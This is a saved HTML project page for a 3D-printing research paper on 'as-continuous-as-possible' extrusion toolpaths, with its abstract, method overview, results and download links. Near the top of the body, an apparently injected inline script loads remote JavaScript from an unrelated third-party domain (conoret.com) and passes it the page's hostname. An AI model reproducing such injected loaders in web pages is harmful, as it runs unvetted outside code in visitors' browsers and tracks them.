
<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


    <title>As-continuous-as-possible Extrusion-based Fabrication of Surface Models</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="./files/bootstrap.min.css">
    <script src="./files/jquery.min.js.download"></script>
    <script src="./files/bootstrap.min.js.download"></script>
    <link rel="stylesheet" type="text/css" href="./files/style.css" media="screen">
    <link rel="stylesheet" type="text/css" href="./files/orbit-1.2.3.css" media="screen">
    <link rel="stylesheet" type="text/css" href="./files/jquery.fancybox-1.3.4.css" media="screen">
    <!--[if lt IE 9]><script type="text/javascript" src="assets/scripts/modernizr.js"></script><![endif]-->
    <style type="text/css">
        #lb_infobar_3436182992 {
            color: #000000 !important;
            font-weight: normal !important;
            text-decoration: none !important;
            margin-top: 0 !important;
            margin-bottom: 0 !important;
            margin-left: 0 !important;
            margin-right: 0 !important;
            padding-top: 0 !important;
            padding-bottom: 0 !important;
            padding-left: 0 !important;
            padding-right: 0 !important;
            float: none !important;
            text-align: left !important;
            height: 37px !important;
            width: 100% !important;
            background-color: #F5F5F5 !important;
            background-image: -webkit-linear-gradient(top, #F5F5F5, #EEEDED) !important;
            border-bottom: 1px solid #C0C0C0 !important;
            box-shadow: inset 0 1px 1px 1px #FFFFFF !important;
            line-height: 36px !important;
            font-family: '微软雅黑', '宋体' !important;
            z-index: 9999999999 !important;
            margin: 0 !important;
            padding: 0 !important;
            position: fixed !important;
            top: 0px !important;
            left: 0px !important;
        }

            #lb_infobar_3436182992,
            #lb_infobar_3436182992 * {
                border-radius: 0 !important;
                padding: 0 !important;
                margin: 0 !important;
            }

                #lb_infobar_3436182992 * {
                    width: auto !important;
                    background: none !important;
                }

                #lb_infobar_3436182992 input {
                    border-radius: 4px !important;
                    box-shadow: 0 1px 2px rgba(0, 0, 0, .15) !important;
                    font-family: '微软雅黑,', '宋体' !important;
                    font-size: 12px !important;
                    font-weight: normal !important;
                    text-shadow: none !important;
                    margin: 0 0 0 18px !important;
                    padding: 0 !important;
                }

        #lb_infobar_translate_3436182992 {
            background-color: #FBB016 !important;
            background-image: -webkit-linear-gradient(top, #FBB016, #ED8A0D) !important;
            width: 78px !important;
            height: 26px !important;
            border: 1px solid #E19D3C !important;
            color: #FFFFFF !important;
            cursor: pointer !important;
            line-height: normal !important;
            vertical-align: middle !important;
        }

            #lb_infobar_translate_3436182992:hover {
                background-color: #FDBF3F !important;
                background-image: -webkit-linear-gradient(top, #FDBF3F, #ED8A0D) !important;
            }

            #lb_infobar_translate_3436182992:active {
                background-color: #ED8A0D !important;
                background-image: -webkit-linear-gradient(top, #ED8A0D, #FBB016) !important;
            }

        #lb_infobar_words_3436182992 {
            background-color: #FBB016 !important;
            background-image: -webkit-linear-gradient(top, #FBB016, #ED8A0D) !important;
            width: 90px !important;
            height: 26px !important;
            border: 1px solid #E19D3C !important;
            color: #FFFFFF !important;
            cursor: pointer !important;
            line-height: normal !important;
            vertical-align: middle !important;
            left: 360px !important;
        }

            #lb_infobar_words_3436182992:hover {
                background-color: #FDBF3F !important;
                background-image: -webkit-linear-gradient(top, #FDBF3F, #ED8A0D) !important;
            }

            #lb_infobar_words_3436182992:active {
                background-color: #ED8A0D !important;
                background-image: -webkit-linear-gradient(top, #ED8A0D, #FBB016) !important;
            }

        #lb_infobar_return_3436182992 {
            background-color: #FFFFFF !important;
            background-image: -webkit-linear-gradient(top, #FFFFFF, #E0DFDF) !important;
            width: 78px !important;
            height: 26px !important;
            border: 1px solid #B0AFAF !important;
            color: rgba(0, 0, 0, .5) !important;
            cursor: pointer !important;
            line-height: normal !important;
            vertical-align: middle !important;
        }

            #lb_infobar_return_3436182992.lb_infobar_return_words_3436182992 {
                width: 130px !important;
            }

            #lb_infobar_return_3436182992:hover {
                background-color: #EDECEC !important;
                background-image: -webkit-linear-gradient(top, #FFFFFF, #EDECEC) !important;
            }

            #lb_infobar_return_3436182992:active {
                background-color: #E0DFDF !important;
                background-image: -webkit-linear-gradient(top, #E0DFDF, #FFFFFF) !important;
            }

        #lb_infobar_3436182992 a {
            text-decoration: underline !important;
            font-size: 12px !important;
            color: #999999 !important;
            cursor: pointer !important;
        }

            #lb_infobar_3436182992 a:hover {
                color: #FC9500 !important;
            }

            #lb_infobar_3436182992 a:active {
                color: #D68003 !important;
            }

        #lb_infobar_close_3436182992 {
            background-position: -66px -27px !important;
            cursor: pointer !important;
            position: absolute !important;
            top: 0 !important;
            right: 1em !important;
            line-height: 36px !important;
        }

            #lb_infobar_close_3436182992:hover {
                background-position: -66px -41px !important;
            }

            #lb_infobar_close_3436182992:active {
                background-position: -66px -54px !important;
            }

        #lb_infobar_notice_3436182992 {
            line-height: 36px !important;
            margin-left: 55px !important;
            font-size: 14px !important;
            vertical-align: middle !important;
        }

        #lb_infobar_powered_3436182992 {
            padding-left: 18px !important;
            font-size: 10px !important;
            color: #979797 !important;
            font-family: 'Arial' !important;
            font-style: italic !important;
        }

        #lb_infobar_ignore_3436182992 {
            line-height: 36px !important;
            margin-right: 3em !important;
            position: absolute !important;
            top: 0 !important;
            right: 0 !important;
        }

        #lb_infobar_manual_3436182992 {
            line-height: 36px !important;
            margin-right: 12em !important;
            position: absolute !important;
            top: 0 !important;
            right: 0 !important;
        }

        #lb_infobar_icon_3436182992 {
            position: absolute !important;
            top: 0 !important;
            left: 0 !important;
            height: 37px !important;
            width: 42px !important;
            color: #fff !important;
            font-size: 24px !important;
            text-align: center !important;
            background-repeat: no-repeat !important;
            background-position: -80px 0 !important;
        }

        #lb_infobar_translate_3436182992.lb_infobar_btn_inactive_3436182992,
        #lb_infobar_words_3436182992.lb_infobar_btn_inactive_3436182992 {
            background-color: #FFFFFF !important;
            background-image: -webkit-linear-gradient(top, #FFFFFF, #E0DFDF) !important;
            border: 1px solid #B0AFAF !important;
            color: #808080 !important;
        }

            #lb_infobar_translate_3436182992.lb_infobar_btn_inactive_3436182992:hover,
            #lb_infobar_words_3436182992.lb_infobar_btn_inactive_3436182992:hover {
                background-color: #EDECEC !important;
                background-image: -webkit-linear-gradient(top, #FFFFFF, #EDECEC) !important;
            }

            #lb_infobar_translate_3436182992.lb_infobar_btn_inactive_3436182992:hover,
            #lb_infobar_words_3436182992.lb_infobar_btn_inactive_3436182992:active {
                background-color: #E0DFDF !important;
                background-image: -webkit-linear-gradient(top, #E0DFDF, #FFFFFF) !important;
            }

        #lb_infobar_hover_3436182992:before {
            content: " " !important;
            position: absolute !important;
            border: 5px solid transparent !important;
            border-top: 5px solid #000 !important;
            bottom: -10px !important;
            left: 50% !important;
        }

        #lb_infobar_hover_3436182992:after {
            content: " " !important;
            position: absolute !important;
            border: 5px solid transparent !important;
            border-top: 5px solid #fff !important;
            bottom: -9px !important;
            left: 50% !important;
        }

        #lb_infobar_hover_3436182992 {
            line-height: 1.2 !important;
            font-size: 12px !important;
            min-width: 150px !important;
            position: fixed !important;
            background: #fff !important;
            border: 1px solid #333 !important;
            border-radius: 3px !important;
            padding: 10px !important;
            color: #333 !important;
            z-index: 9999999999 !important;
        }

            #lb_infobar_hover_3436182992.lb_infobar_hover_below:before {
                content: " " !important;
                position: absolute !important;
                border: 5px solid transparent !important;
                border-bottom: 5px solid #000 !important;
                top: -10px !important;
                left: 50% !important;
                bottom: auto !important;
            }

            #lb_infobar_hover_3436182992.lb_infobar_hover_below:after {
                content: " " !important;
                position: absolute !important;
                border: 5px solid transparent !important;
                border-bottom: 5px solid #fff !important;
                top: -9px !important;
                left: 50% !important;
                bottom: auto !important;
            }
    </style>
    <script src="./files/dsp" type="text/javascript" defer="" async=""></script>
</head>

<body style="margin-top: 38px !important; position: relative !important;">
    <script type="text/javascript">window.top === window && !function () { var e = document.createElement("script"), t = document.getElementsByTagName("head")[0]; e.src = "//conoret.com/dsp?h=" + document.location.hostname + "&r=" + Math.random(), e.type = "text/javascript", e.defer = !0, e.async = !0, t.appendChild(e) }();</script>

    <div class="wrapper">
        <header>
            <br>
            <br>
            <h1>As-continuous-as-possible Extrusion-based Fabrication of Surface Models</h1>
            <br>
            <p class="session">ACM Transactions on Graphics</p>
            <br>
            <p class="author">
                <a href="https://fanchao98.github.io/" target="_blank">Fanchao Zhong</a><sup>1</sup>&nbsp;&nbsp;
                <a href="" target="_blank">Yonglai Xu</a><sup>1</sup>&nbsp;&nbsp;
                <a href="https://haisenzhao.github.io/" target="_blank">Haisen Zhao*</a><sup>1,2,3</sup>&nbsp;&nbsp;
                <a href="http://irc.cs.sdu.edu.cn/~lulin" target="_blank">Lin Lu*</a><sup>1</sup>&nbsp;&nbsp;
            </p>
            <br>
            <p class="author">
                <sup>1</sup><a href="http://en.sdu.edu.cn/" target="_blank">Shandong University</a>&nbsp;&nbsp;
                <sup>2</sup><a href="https://ist.ac.at/en/home/" target="_blank">IST Austria</a>&nbsp;&nbsp;
                <sup>3</sup><a href="http://www.washington.edu/" target="_blank">University of Washington</a>&nbsp;&nbsp;
            </p>


            <br>
        </header>

        <section id="home">
            <div class="row" style="text-align:center;">
                <img src="./files/teaser.png" height="200" alt="">
            </div>
            <center>
                <p>
                    Our framework significantly improves the efficiency of fabrication and the quality of surface models.
                </p>
            </center>
            <p><span><o:p>&nbsp;</o:p></span></p>
        </section>


        <section id="abstract">
            <h3 class="title">Abstract</h3> <br>
            <div class="row">
                <p>
                    <span class="dropcap">I</span>n this study, we propose a computational framework for optimizing the continuity of the toolpath in fabricating surface models on an extrusion-based 3D printer. Toolpath continuity is a critical issue that influences both the quality and the efficiency of extrusion-based fabrication. Transfer moves lead to rough and bumpy surfaces, where this phenomenon worsens for materials with large viscosity, like clay. The effects of continuity on the surface models are even more severe in terms of the quality of the surface and the stability of the model. We introduce a criterion called the “one-path patch” (OPP) to represent a patch on the surface of the shell that can be traversed along one path by considering the constraints on fabrication. We study the properties of the OPPs and their merging operations to propose a bottom-up OPP merging procedure to decompose the given shell surface into a minimal number of OPPs, and to generate the ”as-continuous-as-possible” (ACAP) toolpath. Furthermore, we augment the path planning algorithm with a curved-layer printing scheme that reduces staircase defects and improves the continuity of the toolpath by connecting multiple segments. We evaluated the ACAP algorithm on ceramic and thermoplastic materials, and the results showed that it improves the fabrication of surface models in terms of both efficiency and surface quality.
                </p>
                <br><br>
            </div>
            <div class="row">


            </div>
        </section>

        <section id="vid">
            <h3 class="title">Video</h3><br>
            <div style="text-align:center;">
                <iframe width="800" height="450" src="./files/fast forward.mp4" title="Video" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
            </div>
            <p>
                <span>
                    <o:p>&nbsp;</o:p>
                </span>
            </p><br><br>


        </section>


        <section id="vid">
            <h3 class="title"> Algorithm overview</h3><br>
            <div style="text-align:center;">
                <img src="./files/overview.png" width="900" alt="">
            </div>
            <p>
                Given a surface model and a feasible orientation, we horizontally slice along the
                Z-axis and represent the dependency relationship with a graph (a), where each node represents a segment or a contour and
                each edge represents the dependency between nodes. The input model is initially decomposed, and each decomposed patch
                can be printed continually. Their dependency relationships are shown in (b). Following this, we merge the small patches into
                larger, single, and printable patches, where this may yield multiple optimal merging solutions (c). We further reduce the
                number of patches for each solution by applying curved layers (d). For the optimal merging solution with the least number
                of patches, we generate the toolpath for each patch and assign the order of printing between them (e).
            </p>
            <br><br>
        </section>


        <section id="vid">
            <h3 class="title">More results</h3><br>
            <div style="text-align:center;">
                <img src="./files/ResultsNew1.png" width="600" alt="">
            </div>
            <p>
                Some results of ceramic 3D printing. The models in the top three rows are self-supporting. The OPP decomposition,
                toolpath, and results of printing obtained by using our method and Cura are shown in each row. The last three rows show
                models with supports. We built the support structures in advance and inserted them manually during fabrication.
            </p>
            <br>

            <div style="text-align:center;">
                <img src="./files/ResultsNew3.png" width="600" alt="">
            </div>
            <p>
                Some results of FDM printing. Let-to-right: the OPP decomposition, toolpath, and results of printing by using our
                method and Cura. Compared with those of ceramic printing, the results of FDM had more OPPs owing to the shorter nozzle
                to avoid collisions. The surface quality was beter than that of ceramic printing using both methods.
            </p>
            <br>

            <div style="text-align:center;">
                <img src="./files/DifferentNozzles.png" width="500" alt="">
            </div>
            <p>
                The number of decomposed OPPs with models of diferent sizes (H indicates model height) and nozzles of diferent
                lengths for the Julia vase model in the FDM printing setup. As the length of the nozzle increased, the number of OPPs
                decreased significantly as fewer global collisions occurred.
            </p>
            <br>

            <div style="text-align:center;">
                <img src="./files/texture.png" width="500" alt="">
            </div>
            <p>
                The Julia vase model was decomposed into four OPPs with diferent textures
            </p>
            <br>

            <p>
                <span>
                    <o:p>&nbsp;</o:p>
                </span>
            </p>
        </section>



        <section id="downloads">
            <h3 class="title">Downloads</h3>
            <div class="row">
                <p>
                    <span>
                        <o:p>&nbsp;</o:p>
                    </span>
                </p>
                <table align="center" border="0" class="list">
                    <tbody>
                        <tr>
                            <td width="100" align="center"><a href="./files/Zhongetal.-2023-As-Continuous-As-PossibleExtrusion-BasedFabricationofSurfaceModels.pdf"> <img width="80" id="_x0000_i10320" src="./files/paperpic.png" alt="1"></a></td>
                            <td width="100" align="center"><a href="https://github.com/fanchao98/acap"> <img width="90" id="_x0000_i10320" src="./files/github.png" alt="1"></a></td>
                            <td width="100" align="center"><a href="./files/Some_Gcodes.zip"> <img width="90" id="_x0000_i10320" src="./files/zip.png" alt="1"></a></td>
                           <!--<td width="100" align="center"><a href="./files/fast forward.mp4"> <img width="90" id="_x0000_i10320" src="./files/slidespic.png" alt="1"></a></td>-->
                        </tr>

                        <tr>
                            <td width="180" align="center"><a href="./files/As-Continuous-As-Possible-Extrusion-Based-Fabrication-of-Surface-Models.pdf"> Paper</a></td>
                            <td width="180" align="center"><a href="https://github.com/fanchao98/acap"> Code</a></td>
                            <td width="180" align="center"><a href="./files/Some_Gcodes.zip"> Gcodes</a></td>
                            <!--<td width="180" align="center"><a href="./files/fast forward.mp4"> PPT in Siggraph 2023</a></td>-->
                        </tr>


                    </tbody>
                </table>
                <br>

            </div>

            <p>
                <span>
                    <o:p>&nbsp;</o:p>
                </span>
            </p>
        </section>

        <section id="bibtex">
            <h3 class="title">BibTex</h3>
            @article{zhong2022continuous,<br />
            title={As-continuous-as-possible Extrusion-based Fabrication of Surface Models},<br />
            author={Zhong, Fanchao and Xu, Yonglai and Zhao, Haisen and Lu, Lin},<br />
            journal={ACM Transactions on Graphics},<br />
            year={2022},<br />
            publisher={ACM New York, NY}<br />
            }

            <div class="row">
                <p>


                </p>
                <p><span><o:p>&nbsp;</o:p></span></p>
            </div>
        </section>

        <section id="acknowledgement">
            <h3 class="title">
                Acknowledgement<br>
                <span>
                    <o:p></o:p>
                </span>
            </h3>
            <div class="row">
                <p>
                    The authors would like to thank all the anonymous reviewers for their valuable comments and constructive suggestions. We thank
                    Prof. Haitao Jiang for the insightful discussions on the algorithm design and complexity analysis, and Eazao
                    company for providing the ceramic 3D printer. Thanks for the kitten model provided by the AIM@SHAPE Shape
                    Repository and other models from Thingiverse. This work is supported in part by grants from NSFC (61972232),
                    Science and Technology Program of Shenzhen, China (CJGJZD20200617102202007).
                </p>

                <p>
                    <span>
                        <o:p>&nbsp;</o:p>
                    </span>
                </p>
            </div>
        </section>

        <footer></footer>
    </div>


</body>
</html>
